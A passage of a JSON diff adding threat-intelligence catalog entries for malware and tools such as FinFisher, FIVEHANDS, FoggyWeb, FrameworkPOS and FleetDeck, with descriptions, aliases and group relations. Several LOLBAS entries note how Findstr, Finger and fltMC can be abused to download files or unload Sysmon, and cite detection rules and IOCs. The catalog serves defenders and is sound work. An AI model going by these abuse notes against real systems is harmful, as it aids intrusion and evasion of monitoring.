mini" + }, + { + "description": "[FELIXROOT](https://app.tidalcyber.com/software/4b1a07cd-4c1f-4d93-a454-07fd59b3039a) is a backdoor that has been used to target Ukrainian victims. [[FireEye FELIXROOT July 2018](https://app.tidalcyber.com/references/501057e2-9a31-46fe-aaa0-427218682153)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0267", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "cf8df906-179c-4a78-bd6e-6605e30f6624", + "type": "similar" + }, + { + "dest-uuid": "78026ff0-63f0-42d8-81de-e02ad8223d68", + "type": "similar" + } + ], + "uuid": "4b1a07cd-4c1f-4d93-a454-07fd59b3039a", + "value": "FELIXROOT" + }, + { + "description": "[Ferocious](https://app.tidalcyber.com/software/3e54ba7a-fd4c-477f-9c2d-34b4f69fc091) is a first stage implant composed of VBS and PowerShell scripts that has been used by [WIRTE](https://app.tidalcyber.com/groups/73da066d-b25f-45ba-862b-1a69228c6baa) since at least 2021.[[Kaspersky WIRTE November 2021](https://app.tidalcyber.com/references/143b4694-024d-49a5-be3c-d9ceca7295b2)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0679", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "73da066d-b25f-45ba-862b-1a69228c6baa", + "type": "used-by" + }, + { + "dest-uuid": "73d08401-005f-4e1f-90b9-8f45d120879f", + "type": "similar" + } + ], + "uuid": "3e54ba7a-fd4c-477f-9c2d-34b4f69fc091", + "value": "Ferocious" + }, + { + "description": "[Fgdump](https://app.tidalcyber.com/software/1bbf04bb-d869-48c5-a538-70a25503de1d) is a Windows password hash dumper. [[Mandiant APT1](https://app.tidalcyber.com/references/865eba93-cf6a-4e41-bc09-de9b0b3c2669)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0120", + "source": "MITRE", + "tags": [], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "4f45dfeb-fe51-4df0-8db3-edf7dd0513fe", + "type": "similar" + } + ], + "uuid": "1bbf04bb-d869-48c5-a538-70a25503de1d", + "value": "Fgdump" + }, + { + "description": "FileZilla is a tool used to perform cross-platform File Transfer Protocol (FTP) to a site, server, or host.[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5031", + "source": "Tidal Cyber", + "tags": [ + "af5e9be5-b86e-47af-91dd-966a5e34a186", + "758c3085-2f79-40a8-ab95-f8a684737927", + "2185ed93-7e1c-4553-9452-c8411b5dca93", + "904ad11a-20ca-479c-ad72-74bd5d9dc7e4", + "1dc8fd1e-0737-405a-98a1-111dd557f1b5", + "35e694ec-5133-46e3-b7e1-5831867c3b55", + "15787198-6c8b-4f79-bf50-258d55072fee", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "d0f3353c-fbdd-4bd5-8793-a42e1f319b59", + "type": "used-by" + }, + { + "dest-uuid": "3d77fb6c-cfb4-5563-b0be-7aa1ad535337", + "type": "used-by" + } + ], + "uuid": "f2a6f899-15a8-4d77-bebd-14bc03958764", + "value": "FileZilla" + }, + { + "description": "[Final1stspy](https://app.tidalcyber.com/software/eb4dc358-e353-47fc-8207-b7cb10d580f7) is a dropper family that has been used to deliver [DOGCALL](https://app.tidalcyber.com/software/81ce23c0-f505-4d75-9928-4fbd627d3bc2).[[Unit 42 Nokki Oct 2018](https://app.tidalcyber.com/references/4eea6638-a71b-4d74-acc4-0fac82ef72f6)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0355", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "013fdfdc-aa32-4779-8f6e-7920615cbf66", + "type": "used-by" + }, + { + "dest-uuid": "a2282af0-f9dd-4373-9b92-eaf9e11e0c71", + "type": "similar" + } + ], + "uuid": "eb4dc358-e353-47fc-8207-b7cb10d580f7", + "value": "Final1stspy" + }, + { + "description": "[[Findstr.exe - LOLBAS Project](/references/fc4b7b28-ac74-4a8f-a39d-ce55df5fca08)]", + "meta": { + "id": "21ce9ebe-477f-449f-ba2b-093f8c440aa7", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "a62634f8-8f42-4874-9669-bea2e053dfea", + "type": "similar" + } + ], + "uuid": "8c3183d9-da91-449e-94e5-1814bec72c1b", + "value": "Findstr.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Write to ADS, discover, or download files with Findstr.exe\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\findstr.exe\n* C:\\Windows\\SysWOW64\\findstr.exe\n\n**Resources:**\n* [https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/](https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/)\n* [https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f](https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_findstr.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_findstr.yml)[[Findstr.exe - LOLBAS Project](/references/fc4b7b28-ac74-4a8f-a39d-ce55df5fca08)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5109", + "source": "Tidal Cyber", + "tags": [ + "6ca537bb-94b6-4b12-8978-6250baa6a5cb", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "ca93af75-0ffa-4df4-b86a-92d4d50e496e", + "type": "used-by" + }, + { + "dest-uuid": "646e35d2-75de-4c1d-8ad3-616d3e155c5e", + "type": "used-by" + }, + { + "dest-uuid": "8c3183d9-da91-449e-94e5-1814bec72c1b", + "type": "similar" + } + ], + "uuid": "a62634f8-8f42-4874-9669-bea2e053dfea", + "value": "Findstr" + }, + { + "description": "[[FireEye FinSpy Sept 2017](https://app.tidalcyber.com/references/142cf7a3-2ca2-4cf3-b95a-9f4b3bc1cdce)] [[Securelist BlackOasis Oct 2017](https://app.tidalcyber.com/references/66121c37-6b66-4ab2-9f63-1adb80dcec62)]", + "meta": { + "id": "6fcf39ed-347a-48d3-a687-da5bc5484adb" + }, + "related": [ + { + "dest-uuid": "41f54ce1-842c-428a-977f-518a5b63b4d7", + "type": "similar" + } + ], + "uuid": "132b2577-e54e-49d4-8579-963dea48bd6a", + "value": "FinSpy" + }, + { + "description": "[FinFisher](https://app.tidalcyber.com/software/41f54ce1-842c-428a-977f-518a5b63b4d7) is a government-grade commercial surveillance spyware reportedly sold exclusively to government agencies for use in targeted and lawful criminal investigations. It is heavily obfuscated and uses multiple anti-analysis techniques. It has other variants including [Wingbird](https://app.tidalcyber.com/software/3e70078f-407e-4b03-b604-bdc05b372f37). [[FinFisher Citation](https://app.tidalcyber.com/references/6ef0b8d8-ba98-49ce-807d-5a85d111b027)] [[Microsoft SIR Vol 21](https://app.tidalcyber.com/references/619b9cf8-7201-45de-9c36-834ccee356a9)] [[FireEye FinSpy Sept 2017](https://app.tidalcyber.com/references/142cf7a3-2ca2-4cf3-b95a-9f4b3bc1cdce)] [[Securelist BlackOasis Oct 2017](https://app.tidalcyber.com/references/66121c37-6b66-4ab2-9f63-1adb80dcec62)] [[Microsoft FinFisher March 2018](https://app.tidalcyber.com/references/88c97a9a-ef14-4695-bde0-9de2b5f5343b)]", + "meta": { + "platforms": [ + "Android", + "Windows" + ], + "software_attack_id": "S0182", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "7ad94dbf-9909-42dd-8b62-a435481bdb14", + "type": "used-by" + }, + { + "dest-uuid": "a5528622-3a8a-4633-86ce-8cdaf8423858", + "type": "similar" + }, + { + "dest-uuid": "132b2577-e54e-49d4-8579-963dea48bd6a", + "type": "similar" + } + ], + "uuid": "41f54ce1-842c-428a-977f-518a5b63b4d7", + "value": "FinFisher" + }, + { + "description": "[[Finger.exe - LOLBAS Project](/references/e32d01eb-d904-43dc-a7e2-bdcf42f3ebb2)]", + "meta": { + "id": "19edc7d0-ca92-4935-b7ed-483fcc36457c", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "a9ce311d-dd8c-497d-b38f-b535d7318ed4", + "type": "similar" + } + ], + "uuid": "44e3833b-bf22-4adb-9986-95f4e8898f21", + "value": "Finger.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Displays information about a user or users on a specified remote computer that is running the Finger service or daemon\n\n**Author:** Ruben Revuelta\n\n**Paths:**\n* c:\\windows\\system32\\finger.exe\n* c:\\windows\\syswow64\\finger.exe\n\n**Resources:**\n* [https://twitter.com/DissectMalware/status/997340270273409024](https://twitter.com/DissectMalware/status/997340270273409024)\n* [https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/ff961508(v=ws.11)](https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/ff961508(v=ws.11))\n\n**Detection:**\n* Sigma: [proc_creation_win_finger_usage.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_finger_usage.yml)\n* IOC: finger.exe should not be run on a normal workstation.\n* IOC: finger.exe connecting to external resources.[[Finger.exe - LOLBAS Project](/references/e32d01eb-d904-43dc-a7e2-bdcf42f3ebb2)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5110", + "source": "Tidal Cyber", + "tags": [ + "1da4f610-4c54-46a3-b9b3-c38a002b623e", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "44e3833b-bf22-4adb-9986-95f4e8898f21", + "type": "similar" + } + ], + "uuid": "a9ce311d-dd8c-497d-b38f-b535d7318ed4", + "value": "Finger" + }, + { + "description": "[FIVEHANDS](https://app.tidalcyber.com/software/84187393-2fe9-4136-8720-a6893734ee8c) is a customized version of [DEATHRANSOM](https://app.tidalcyber.com/software/832f5ab1-1267-40c9-84ef-f32d6373be4e) ransomware written in C++. [FIVEHANDS](https://app.tidalcyber.com/software/84187393-2fe9-4136-8720-a6893734ee8c) has been used since at least 2021, including in Ransomware-as-a-Service (RaaS) campaigns, sometimes along with [SombRAT](https://app.tidalcyber.com/software/0ec24158-d5d7-4d2e-b5a5-bc862328a317).[[FireEye FiveHands April 2021](https://app.tidalcyber.com/references/832aeb46-b248-43e8-9157-a2f56bcd1806)][[NCC Group Fivehands June 2021](https://app.tidalcyber.com/references/33955c35-e8cd-4486-b1ab-6f992319c81c)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0618", + "source": "MITRE", + "tags": [ + "f1ad9eba-f4fd-4aec-92c0-833ac14d741b", + "5e7433ad-a894-4489-93bc-41e90da90019", + "15787198-6c8b-4f79-bf50-258d55072fee", + "7e7b0c67-bb85-4996-a289-da0e792d7172" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "2e2d3e75-1160-4ba5-80cc-8e7685fcfc44", + "type": "used-by" + }, + { + "dest-uuid": "f464354c-7103-47c6-969b-8766f0157ed2", + "type": "similar" + } + ], + "uuid": "84187393-2fe9-4136-8720-a6893734ee8c", + "value": "FIVEHANDS" + }, + { + "description": "[Flagpro](https://app.tidalcyber.com/software/977aaf8a-2216-40f0-8682-61dd91638147) is a Windows-based, first-stage downloader that has been used by [BlackTech](https://app.tidalcyber.com/groups/528ab2ea-b8f1-44d8-8831-2a89fefd97cb) since at least October 2020. It has primarily been used against defense, media, and communications companies in Japan.[[NTT Security Flagpro new December 2021](https://app.tidalcyber.com/references/c0f523fa-7f3b-4c85-b48f-19ae770e9f3b)] ", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0696", + "source": "MITRE", + "tags": [ + "84615fe0-c2a5-4e07-8957-78ebc29b4635" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "528ab2ea-b8f1-44d8-8831-2a89fefd97cb", + "type": "used-by" + }, + { + "dest-uuid": "592260fb-dd5c-4a30-8d99-106a0485be0d", + "type": "similar" + } + ], + "uuid": "977aaf8a-2216-40f0-8682-61dd91638147", + "value": "Flagpro" + }, + { + "description": "[[Kaspersky Flame](https://app.tidalcyber.com/references/6db8f76d-fe38-43b1-ad85-ad372da9c09d)] [[Symantec Beetlejuice](https://app.tidalcyber.com/references/691ada65-fe64-4917-b379-1db2573eea32)]", + "meta": { + "id": "976f7c49-80d1-4d65-8068-884f69ac0ea2" + }, + "related": [ + { + "dest-uuid": "87604333-638f-4f4a-94e0-16aa825dd5b8", + "type": "similar" + } + ], + "uuid": "4a135c64-23dd-4850-8484-d9805d3663b5", + "value": "Flamer" + }, + { + "description": "[[Kaspersky Flame](https://app.tidalcyber.com/references/6db8f76d-fe38-43b1-ad85-ad372da9c09d)] [[Crysys Skywiper](https://app.tidalcyber.com/references/ea35f530-b0fd-4e27-a7a9-6ba41566154c)]", + "meta": { + "id": "fe1b46e0-98d1-4cf3-a52c-78f3e9e77303" + }, + "related": [ + { + "dest-uuid": "87604333-638f-4f4a-94e0-16aa825dd5b8", + "type": "similar" + } + ], + "uuid": "9a1c376d-6ef8-4d18-a4ff-e28751d30ae1", + "value": "sKyWIper" + }, + { + "description": "[Flame](https://app.tidalcyber.com/software/87604333-638f-4f4a-94e0-16aa825dd5b8) is a sophisticated toolkit that has been used to collect information since at least 2010, largely targeting Middle East countries. [[Kaspersky Flame](https://app.tidalcyber.com/references/6db8f76d-fe38-43b1-ad85-ad372da9c09d)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0143", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "ff6840c9-4c87-4d07-bbb6-9f50aa33d498", + "type": "similar" + }, + { + "dest-uuid": "4a135c64-23dd-4850-8484-d9805d3663b5", + "type": "similar" + }, + { + "dest-uuid": "9a1c376d-6ef8-4d18-a4ff-e28751d30ae1", + "type": "similar" + } + ], + "uuid": "87604333-638f-4f4a-94e0-16aa825dd5b8", + "value": "Flame" + }, + { + "description": "[FLASHFLOOD](https://app.tidalcyber.com/software/44a5e62a-6de4-49d2-8f1b-e68ecdf9f332) is malware developed by [APT30](https://app.tidalcyber.com/groups/be45ff95-6c74-4000-bc39-63044673d82f) that allows propagation and exfiltration of data over removable devices. [APT30](https://app.tidalcyber.com/groups/be45ff95-6c74-4000-bc39-63044673d82f) may use this capability to exfiltrate data across air-gaps. [[FireEye APT30](https://app.tidalcyber.com/references/c48d2084-61cf-4e86-8072-01e5d2de8416)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0036", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "be45ff95-6c74-4000-bc39-63044673d82f", + "type": "used-by" + }, + { + "dest-uuid": "43213480-78f7-4fb3-976f-d48f5f6a4c2a", + "type": "similar" + } + ], + "uuid": "44a5e62a-6de4-49d2-8f1b-e68ecdf9f332", + "value": "FLASHFLOOD" + }, + { + "description": "[FlawedAmmyy](https://app.tidalcyber.com/software/308dbe77-3d58-40bb-b0a5-cd00f152dc60) is a remote access tool (RAT) that was first seen in early 2016. The code for [FlawedAmmyy](https://app.tidalcyber.com/software/308dbe77-3d58-40bb-b0a5-cd00f152dc60) was based on leaked source code for a version of Ammyy Admin, a remote access software.[[Proofpoint TA505 Mar 2018](https://app.tidalcyber.com/references/44e48c77-59dd-4851-8455-893513b7cf45)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0381", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "b3220638-6682-4a4e-ab64-e7dc4202a3f1", + "type": "used-by" + }, + { + "dest-uuid": "fcaadc12-7c17-4946-a9dc-976ed610854c", + "type": "used-by" + }, + { + "dest-uuid": "432555de-63bf-4f2a-a3fa-f720a4561078", + "type": "similar" + } + ], + "uuid": "308dbe77-3d58-40bb-b0a5-cd00f152dc60", + "value": "FlawedAmmyy" + }, + { + "description": "[[The DFIR Report Truebot June 12 2023](/references/a6311a66-bb36-4cad-a98f-2b0b89aafa3d)]", + "meta": { + "id": "8ce0e708-8f28-4c66-be99-cfa7c8e6567a", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "c558e948-c817-4494-a95d-ad3207f10e26", + "type": "similar" + } + ], + "uuid": "c6731561-3f22-451d-adf8-4b80ef07ce65", + "value": "BARBWIRE" + }, + { + "description": "[[The DFIR Report Truebot June 12 2023](/references/a6311a66-bb36-4cad-a98f-2b0b89aafa3d)]", + "meta": { + "id": "2a2b141c-7a11-4e3b-9bcc-ba4b20bcab98", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "c558e948-c817-4494-a95d-ad3207f10e26", + "type": "similar" + } + ], + "uuid": "70bf0820-6ce7-4877-a668-6583aef5a4c2", + "value": "GraceWire" + }, + { + "description": "[FlawedGrace](https://app.tidalcyber.com/software/c558e948-c817-4494-a95d-ad3207f10e26) is a fully featured remote access tool (RAT) written in C++ that was first observed in late 2017.[[Proofpoint TA505 Jan 2019](https://app.tidalcyber.com/references/b744f739-8810-4fb9-96e3-6488f9ed6305)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0383", + "source": "MITRE", + "tags": [ + "1dc8fd1e-0737-405a-98a1-111dd557f1b5", + "15787198-6c8b-4f79-bf50-258d55072fee", + "84615fe0-c2a5-4e07-8957-78ebc29b4635", + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "b3220638-6682-4a4e-ab64-e7dc4202a3f1", + "type": "used-by" + }, + { + "dest-uuid": "43155329-3edf-47a6-9a14-7dac899b01e4", + "type": "similar" + }, + { + "dest-uuid": "c6731561-3f22-451d-adf8-4b80ef07ce65", + "type": "similar" + }, + { + "dest-uuid": "70bf0820-6ce7-4877-a668-6583aef5a4c2", + "type": "similar" + } + ], + "uuid": "c558e948-c817-4494-a95d-ad3207f10e26", + "value": "FlawedGrace" + }, + { + "description": "", + "meta": { + "id": "22473be6-5a16-4341-8af1-1d15d3f7990e", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "68758d3a-ec4b-4c19-933d-b4c3000281b2", + "type": "similar" + } + ], + "uuid": "6f5b39e8-5c52-478c-b9f6-89822c43d859", + "value": "Commander" + }, + { + "description": "FleetDeck is a commercial remote monitoring and management (RMM) tool that enables remote desktop access and “virtual terminal” capabilities. Government and commercial reports indicate that financially motivated adversaries, including BlackCat (AKA ALPHV or Noberus) actors and Scattered Spider (AKA 0ktapus or UNC3944), have used FleetDeck for command and control and persistence purposes during intrusions.[[Cyber Centre ALPHV/BlackCat July 25 2023](/references/610c8f22-1a96-42d2-934d-8467d136eed2)][[CrowdStrike Scattered Spider SIM Swapping December 22 2022](/references/e48760ba-2752-4d30-8f99-152c81f63017)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5056", + "source": "Tidal Cyber", + "tags": [ + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207", + "e727eaa6-ef41-4965-b93a-8ad0c51d0236" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "3d77fb6c-cfb4-5563-b0be-7aa1ad535337", + "type": "used-by" + }, + { + "dest-uuid": "33159d02-a1ce-49ec-a381-60b069db66f7", + "type": "used-by" + }, + { + "dest-uuid": "6f5b39e8-5c52-478c-b9f6-89822c43d859", + "type": "similar" + } + ], + "uuid": "68758d3a-ec4b-4c19-933d-b4c3000281b2", + "value": "FleetDeck" + }, + { + "description": "[FLIPSIDE](https://app.tidalcyber.com/software/18002747-ddcc-42c1-b0ca-1e598a9f1919) is a simple tool similar to Plink that is used by [FIN5](https://app.tidalcyber.com/groups/7902f5cc-d6a5-4a57-8d54-4c75e0c58b83) to maintain access to victims. [[Mandiant FIN5 GrrCON Oct 2016](https://app.tidalcyber.com/references/2bd39baf-4223-4344-ba93-98aa8453dc11)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0173", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "7902f5cc-d6a5-4a57-8d54-4c75e0c58b83", + "type": "used-by" + }, + { + "dest-uuid": "0e18b800-906c-4e44-a143-b11c72b3448b", + "type": "similar" + } + ], + "uuid": "18002747-ddcc-42c1-b0ca-1e598a9f1919", + "value": "FLIPSIDE" + }, + { + "description": "[[fltMC.exe - LOLBAS Project](/references/cf9b4bd3-92f0-405b-85e7-95e65d548b79)]", + "meta": { + "id": "2b283bd4-c8d1-4899-94b2-dab6b258138d", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "43d57826-cd15-4154-8f04-38351c96986e", + "type": "similar" + } + ], + "uuid": "91939985-db0a-4ba9-9fd7-9785615cc0f4", + "value": "fltMC.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Filter Manager Control Program used by Windows\n\n**Author:** John Lambert\n\n**Paths:**\n* C:\\Windows\\System32\\fltMC.exe\n\n**Resources:**\n* [https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon](https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon)\n\n**Detection:**\n* Sigma: [proc_creation_win_fltmc_unload_driver_sysmon.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_fltmc_unload_driver_sysmon.yml)\n* Elastic: [defense_evasion_via_filter_manager.toml](https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_via_filter_manager.toml)\n* Splunk: [unload_sysmon_filter_driver.yml](https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/unload_sysmon_filter_driver.yml)\n* IOC: 4688 events with fltMC.exe[[fltMC.exe - LOLBAS Project](/references/cf9b4bd3-92f0-405b-85e7-95e65d548b79)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5111", + "source": "Tidal Cyber", + "tags": [ + "49bbb074-2406-4f27-ad77-d2e433ba1ccb", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "91939985-db0a-4ba9-9fd7-9785615cc0f4", + "type": "similar" + } + ], + "uuid": "43d57826-cd15-4154-8f04-38351c96986e", + "value": "fltMC" + }, + { + "description": "[FoggyWeb](https://app.tidalcyber.com/software/bc11844e-0348-4eed-a48a-0554d68db38c) is a passive and highly-targeted backdoor capable of remotely exfiltrating sensitive information from a compromised Active Directory Federated Services (AD FS) server. It has been used by [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) since at least early April 2021.[[MSTIC FoggyWeb September 2021](https://app.tidalcyber.com/references/1ef61100-c5e7-4725-8456-e508c5f6d68a)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0661", + "source": "MITRE", + "tags": [ + "8bf128ad-288b-41bc-904f-093f4fdde745" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "4c3e48b9-4426-4271-a7af-c3dfad79f447", + "type": "used-by" + }, + { + "dest-uuid": "72911fe3-f085-40f7-b4f2-f25a4221fe44", + "type": "similar" + } + ], + "uuid": "bc11844e-0348-4eed-a48a-0554d68db38c", + "value": "FoggyWeb" + }, + { + "description": "", + "meta": { + "id": "22141301-25e2-43de-a956-99b453421dec", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "c6dc67a6-587d-4700-a7de-bee043a0031a", + "type": "similar" + } + ], + "uuid": "f283d74b-b2fe-4974-8dc2-d33c93575b2a", + "value": "Forfiles.exe" + }, + { + "description": "[Forfiles](https://app.tidalcyber.com/software/c6dc67a6-587d-4700-a7de-bee043a0031a) is a Windows utility commonly used in batch jobs to execute commands on one or more selected files or directories (ex: list all directories in a drive, read the first line of all files created yesterday, etc.). Forfiles can be executed from either the command line, Run window, or batch files/scripts. [[Microsoft Forfiles Aug 2016](https://app.tidalcyber.com/references/fd7eaa47-3512-4dbd-b881-bc679d06cd1b)]", + "meta": { + "platforms": [], + "software_attack_id": "S0193", + "source": "MITRE", + "tags": [ + "91804406-e20a-4455-8dbc-5528c35f8e20", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "5b1a5b9e-4722-41fc-a15d-196a549e3ac5", + "type": "used-by" + }, + { + "dest-uuid": "0bc66e95-de93-4de7-b415-4041b7191f08", + "type": "used-by" + }, + { + "dest-uuid": "90ec2b22-7061-4469-b539-0989ec4f96c2", + "type": "similar" + }, + { + "dest-uuid": "f283d74b-b2fe-4974-8dc2-d33c93575b2a", + "type": "similar" + } + ], + "uuid": "c6dc67a6-587d-4700-a7de-bee043a0031a", + "value": "Forfiles" + }, + { + "description": "[[SentinelOne FrameworkPOS September 2019](https://app.tidalcyber.com/references/054d7827-3d0c-40a7-b2a0-1428ad7729ea)]", + "meta": { + "id": "0a491f01-4378-4cec-838e-a67d63820a95" + }, + "related": [ + { + "dest-uuid": "aef7cbbc-5163-419c-8e4b-3f73bed50474", + "type": "similar" + } + ], + "uuid": "ebc42f24-1194-4e44-baa2-50dfa222162e", + "value": "Trinity" + }, + { + "description": "[FrameworkPOS](https://app.tidalcyber.com/software/aef7cbbc-5163-419c-8e4b-3f73bed50474) is a point of sale (POS) malware used by [FIN6](https://app.tidalcyber.com/groups/fcaadc12-7c17-4946-a9dc-976ed610854c) to steal payment card data from sytems that run physical POS devices.[[SentinelOne FrameworkPOS September 2019](https://app.tidalcyber.com/references/054d7827-3d0c-40a7-b2a0-1428ad7729ea)]", + "meta": { + "platforms": [], + "software_attack_id": "S0503", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "fcaadc12-7c17-4946-a9dc-976ed610854c", + "type": "used-by" + }, + { + "dest-uuid": "1cdbbcab-903a-414d-8eb0-439a97343737", + "type": "similar" + }, + { + "dest-uuid": "ebc42f24-1194-4e44-baa2-50dfa222162e", + "type": "similar" + } + ], + "uuid": "aef7cbbc-5163-419c-8e4b-3f73bed50474", + "value": "FrameworkPOS" + }, + { + "description": "FreeFileSync is a tool used to facilitate cloud-based file synchronization.[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5032", + "source": "Tidal Cyber", + "tags": [ + "ed2b3f47-3e07-4019-a9bf-ec9d87f28c96", + "af5e9be5-b86e-47af-91dd-966a5e34a186", + "758c3085-2f79-40a8-ab95-f8a684737927", + "2185ed93-7e1c-4553-9452-c8411b5dca93", + "904ad11a-20ca-479c-ad72-74bd5d9dc7e4", + "1dc8fd1e-0737-405a-98a1-111dd557f1b5", + "35e694ec-5133-46e3-b7e1-5831867c3b55", + "15787198-6c8b-4f79-bf50-258d55072fee", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "d0f3353c-fbdd-4bd5-8793-a42e1f319b59", + "type": "used-by" + } + ], + "uuid": "1d5c5822-3cb4-455a-9976-f6bc17e2820d", + "value": "FreeFileSync" + }, + { + "description": "FruitFly is designed to spy on mac users [[objsee mac malware 2017](https://app.tidalcyber.com/references/08227ae5-4086-4c31-83d9-459c3a097754)].", + "meta": { + "platforms": [ + "macOS" + ], + "software_attack_id": "S0277", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "4a98e44a-bd52-461e-af1e-a4457de87a36", + "type": "similar" + } + ], + "uuid": 